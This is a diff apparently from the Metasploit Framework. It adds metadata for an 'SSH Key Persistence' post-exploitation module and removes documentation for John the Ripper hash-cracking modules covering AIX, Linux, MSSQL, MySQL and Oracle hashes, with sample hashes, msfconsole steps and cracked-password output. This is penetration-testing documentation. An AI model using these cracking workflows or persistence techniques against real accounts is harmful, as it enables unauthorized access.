    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-26 11:31:34 +0000",
    "path": "/modules/post/windows/manage/reflective_dll_inject.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/reflective_dll_inject",
@@ -172262,6 +173155,39 @@
    },
    "needs_cleanup": null
  },
+  "post_windows/manage/sshkey_persistence": {
+    "name": "SSH Key Persistence",
+    "fullname": "post/windows/manage/sshkey_persistence",
+    "aliases": [
+
+    ],
+    "rank": 400,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Dean Welch <dean_welch@rapid7.com>"
+    ],
+    "description": "This module will add an SSH key to a specified user (or all), to allow\n          remote login via SSH at any time.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-03-05 14:48:37 +0000",
+    "path": "/modules/post/windows/manage/sshkey_persistence.rb",
+    "is_install_path": true,
+    "ref_name": "windows/manage/sshkey_persistence",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "post_windows/manage/sticky_keys": {
    "name": "Sticky Keys Persistance Module",
    "fullname": "post/windows/manage/sticky_keys",
@@ -1,141 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode AIX 
-  based password hashes, such as:
-
-  * `DES` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-## Verification Steps
-
-  1. Have at least one user with a `des` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_aix```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:des_password hash:rEK1ecacw.7.c jtr:des
-creds add user:des_passphrase hash:qiyh4XPJGsOZ2MEAyLkfWqeQ jtr:des
-```
-
-Crack them:
-
-```
-[*] Hashes Written out to /tmp/hashes_tmp20190211-5021-1p3x0lx
-[*] Wordlist file written out to /tmp/jtrtmp20190211-5021-66w3u0
-[*] Cracking descrypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:00 DONE (2019-02-11 19:29) 0g/s 4206Kp/s 4206Kc/s 4206KC/s scandal..vagrant
-Session completed
-[*] Cracking descrypt hashes in single mode...
-Using default input encoding: UTF-8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:05 DONE (2019-02-11 19:29) 0g/s 6681Kp/s 6681Kc/s 6681KC/s qt1902..tude1900
-Session completed
-[*] Cracking descrypt hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-Will run 8 OpenMP threads
-Warning: MaxLen = 20 is too large for the current hash type, reduced to 8
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:05 DONE (2019-02-11 19:29) 0g/s 21083Kp/s 21083Kc/s 21083KC/s 73602400..73673952
-Session completed
-[*] Cracked Passwords this run:
-[+] des_password:password
-[+] des_passphrase:????????se
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_aix) > creds
-Credentials
-===========
-
-host  origin  service  public          private                   realm  private_type        JtR Format
----  ------  -------  ------          -------                   -----  ------------        ----------
-                       des_passphrase  ????????se                       Password            
-                       des_passphrase  qiyh4XPJGsOZ2MEAyLkfWqeQ         Nonreplayable hash  des
-                       des_password    rEK1ecacw.7.c                    Nonreplayable hash  des
-                       des_password    password                         Password            
-
-```
@@ -1,176 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Linux
-  based password hashes, such as:
-
-  * `DES` based passwords
-  * `MD5` based passwords
-  * `BSDi` based passwords
-  * With `crypt` set to `true`:
-    * `bf`, `bcrypt`, or `blowfish` based passwords
-    * `SHA256` based passwords
-    * `SHA512` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-  The definition of `crypt` according to JTR and waht algorithms it decodes can be found
-  [here](https://github.com/magnumripper/JohnTheRipper/blob/ae24a410baac45bb36884d793c429adeb7197336/src/c3_fmt.c#L731)
-
-## Verification Steps
-
-  1. Have at least one user with an `des`, `md5`, `bsdi`, `crypt`, `blowfish`, `sha512`, or `sha256` password hash in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_linux```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CRYPT**
-
-   Include `blowfish` and `SHA`(256/512) passwords.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:des_password hash:rEK1ecacw.7.c jtr:des
-creds add user:md5_password hash:$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/ jtr:md5
-creds add user:bsdi_password hash:_J9..K0AyUubDrfOgO4s jtr:bsdi
-creds add user:sha256_password hash:$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5 jtr:sha256,crypt
-creds add user:sha512_password hash:$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1 jtr:sha512,crypt
-creds add user:blowfish_password hash:$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe jtr:bf
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_linux 
-msf5 auxiliary(analyze/jtr_linux) > set crypt true
-crypt => true
-msf5 auxiliary(analyze/jtr_linux) > run
-
-[*] Hashes Written out to /tmp/hashes_tmp20190211-5021-hqwf2h
-[*] Wordlist file written out to /tmp/jtrtmp20190211-5021-1ixz59k
-[*] Cracking md5crypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] md5_password:password
-[*] Cracking descrypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] des_password:password
-[*] Cracking bsdicrypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] bsdi_password:password
-[*] Cracking crypt hashes in normal wordlist mode...
-Warning: hash encoding string length 20, type id #4
-appears to be unsupported on this system; will not load such hashes.
-Warning: hash encoding string length 60, type id $2
-appears to be unsupported on this system; will not load such hashes.
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] des_password:password
-[+] md5_password:password
-[+] sha256_password:password
-[+] sha512_password:password
-[*] Cracking bcrypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] blowfish_password:password
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_linux) > creds
-Credentials
-===========
-
-host  origin  service  public             private                                                                                             realm  private_type        JtR Format
----  ------  -------  ------             -------                                                                                             -----  ------------        ----------
-                       bsdi_password      password                                                                                                   Password            
-                       des_password       password                                                                                                   Password            
-                       sha256_password    $5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5                                                    Nonreplayable hash  sha256,crypt
-                       md5_password       password                                                                                                   Password            
-                       md5_password       $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/                                                                         Nonreplayable hash  md5
-                       bsdi_password      _J9..K0AyUubDrfOgO4s                                                                                       Nonreplayable hash  bsdi
-                       sha512_password    password                                                                                                   Password            
-                       blowfish_password  $2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe                                               Nonreplayable hash  bf
-                       sha512_password    $6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1         Nonreplayable hash  sha512,crypt
-                       sha256_password    password                                                                                                   Password            
-                       des_password       rEK1ecacw.7.c                                                                                              Nonreplayable hash  des
-                       blowfish_password  password                                                                                                   Password            
-
-```
@@ -1,157 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Microsoft
-  SQL based password hashes, such as:
-
-  * `mssql` based passwords
-  * `mssql05` based passwords
-  * `mssql12` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-## Verification Steps
-
-  1. Have at least one user with an `mssql`, `mssql05` or `mssql12` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_mssql_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:mssql05_toto hash:0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908 jtr:mssql05
-creds add user:mssql_foo hash:0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254 jtr:mssql
-creds add user:mssql12_Password1! hash:0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16 jtr:mssql12 
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_mssql_fast 
-msf5 auxiliary(analyze/jtr_mssql_fast) > run
-
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-u353o8
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-hcwr36
-[*] Cracking mssql05 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql05 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql05 hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mssql05_toto:toto
-[+] mssql_foo:foo
-[+] mssql05_toto:toto
-[+] mssql_foo:foo
-[*] Cracking mssql hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mssql_foo:FOO
-[+] mssql_foo:FOO
-[*] Cracking mssql12 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql12 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql12 hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mssql12_Password1!:Password1!
-[+] mssql12_Password1!:Password1!
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_mssql_fast) > creds
-Credentials
-===========
-
-host  origin  service  public              private                                                                                                                                         realm  private_type        JtR Format
----  ------  -------  ------              -------                                                                                                                                         -----  ------------        ----------
-                       mssql05_toto        toto                                                                                                                                                   Password            
-                       mssql05_toto        0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908                                                                                                 Nonreplayable hash  mssql05
-                       mssql_foo           FOO                                                                                                                                                    Password            
-                       mssql_foo           foo                                                                                                                                                    Password            
-                       mssql_foo           0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254                                                         Nonreplayable hash  mssql
-                       mssql12_Password1!  Password1!                                                                                                                                             Password            
-                       mssql12_Password1!  0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16         Nonreplayable hash  mssql12
-
-```
@@ -1,139 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode MySQL
-  based password hashes, such as:
-
-  * `mysql` (pre 4.1) based passwords
-  * `mysql-sha1` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-## Verification Steps
-
-  1. Have at least one user with an `mysql`, or `mysql-sha1` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_mysql_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:mysql_probe hash:445ff82636a7ba59 jtr:mysql
-creds add user:mysql-sha1_tere hash:*5AD8F88516BD021DD43F171E2C785C69F8E54ADB jtr:mysql-sha1
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_mysql_fast 
-msf5 auxiliary(analyze/jtr_mysql_fast) > run
-
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-o7pt47
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-3t366y
-[*] Cracking mysql hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mysql hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mysql hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mysql_probe:probe
-[*] Cracking mysql-sha1 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mysql-sha1 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mysql-sha1 hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mysql-sha1_tere:tere
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_mysql_fast) > creds
-Credentials
-===========
-
-host  origin  service  public           private                                    realm  private_type        JtR Format
----  ------  -------  ------           -------                                    -----  ------------        ----------
-                       mysql_probe      probe                                             Password            
-                       mysql_probe      445ff82636a7ba59                                  Nonreplayable hash  mysql
-                       mysql-sha1_tere  tere                                              Password            
-                       mysql-sha1_tere  *5AD8F88516BD021DD43F171E2C785C69F8E54ADB         Nonreplayable hash  mysql-sha1
-
-```
@@ -1,168 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode oracle
-  based password hashes, such as:
-
-  * `oracle` (<=10) aka `des` based passwords
-  * `oracle11` based passwords
-  * Oracle 11 and 12c backwards compatibility `H` field (MD5)
-  * `oracle12c` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-  For a detailed explanation of Oracle 11/12c formats, see
-  [www.trustwave.com](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/changes-in-oracle-database-12c-password-hashes/).
-
-  Oracle 11/12c `H` field is `dynamic_1506` in JtR and added
-  [here](https://github.com/magnumripper/JohnTheRipper/commit/53973c5e6eb026ea232ba643f9aa20a1ffee0ffb)
-
-## Verification Steps
-
-  1. Have at least one user with an `oracle`, `oracle11`, or `oracle12c` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_oracle_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:simon hash:4F8BC1809CB2AF77 jtr:des,oracle
-creds add user:SYSTEM hash:9EEDFA0AD26C6D52 jtr:des,oracle
-creds add user:DEMO hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle
-creds add user:oracle11_epsilon hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle
-creds add user:oracle12c_epsilon hash:'H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B' jtr:pbkdf2,oracle12c
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_oracle_fast 
-msf5 auxiliary(analyze/jtr_oracle_fast) > run
-
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-v6a8wg
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-123367o
-[*] Cracking oracle hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking oracle hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[+] simon:A
-[+] SYSTEM:THALES
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1skc10b
-[*] Cracking dynamic_1506 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking dynamic_1506 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1qwsyoy
-[*] Cracking oracle11 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking oracle11 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[+] DEMO:epsilon
-[+] oracle11_epsilon:epsilon
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1f9piv4
-[*] Cracking oracle12c hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking oracle12c hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[+] oracle12c_epsilon:epsilon
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_oracle_fast) > creds
-Credentials
-===========
-
-host  origin  service  public             private                                                                                                                                                                                                                                                               realm  private_type        JtR Format
----  ------  -------  ------             -------                                                                                                                                                                                                                                                               -----  ------------        ----------
-                       simon              A                                                                                                                                                                                                                                                                            Password            
-                       simon              4F8BC1809CB2AF77                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
-                       SYSTEM             THALES                                                                                                                                                                                                                                                                       Password            
-                       SYSTEM             9EEDFA0AD26C6D52                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
-                       DEMO               epsilon                                                                                                                                                                                                                                                                      Password            
-                       DEMO               S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
-                       oracle11_epsilon   epsilon                                                                                                                                                                                                                                                                      Password            
